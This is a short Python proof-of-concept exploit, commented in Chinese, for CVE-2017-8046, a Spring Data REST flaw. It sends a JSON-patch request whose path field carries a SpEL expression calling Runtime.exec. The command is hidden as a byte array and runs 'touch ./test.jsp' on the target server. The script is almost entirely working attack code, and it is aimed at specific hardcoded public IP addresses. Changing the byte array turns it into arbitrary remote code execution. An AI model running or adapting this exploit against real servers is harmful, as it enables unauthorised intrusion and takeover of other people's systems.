# SpringCVE-2017-8046
# 执行的命令：/usr/bin/touch ./test.jsp
# 利用小葵转ascii转换为47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112
# 输入命令：python3 SpringCVE-2017-8046.py 207.246.80.61:8080
import requests
import json
import sys

# url = input('输入待测的url（ip或者域名）和端口：')
headers1 = {"Content-Type": "application/json",
           "Cache-Control": "no-cache"}
headers2 = {"Content-Type": "application/json-patch+json",
                "Cache-Control": "no-cache"
    }
data1 = {"firstName": "VulApps", "lastName": "VulApps"}
data2 = [{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName", "value": "vulapps-demo" }]

def attack(url):
    try:
        # 利用 POST 请求添加一个数据
        url1 = r'http://{}/persons'.format(url)
        response1 = requests.post(url=url1,headers=headers1,data=json.dumps(data1))

        # 执行 POC
        url2 = r'http://{}/persons/1'.format(url)
        response2 = requests.patch(url=url2, headers=headers2, data=json.dumps(data2))
        content2 = response2.text
        if 'maybe not public' in content2:
            print("[+]已在目标服务器的根目录下生成了test.jsp文件！")
    except Exception as e:
        print('[-]不存在SpringCVE-2017-8046漏洞!')

if __name__ == '__main__':
    #url = sys.argv[1]
    url = '45.77.100.221:8080'
    attack(url)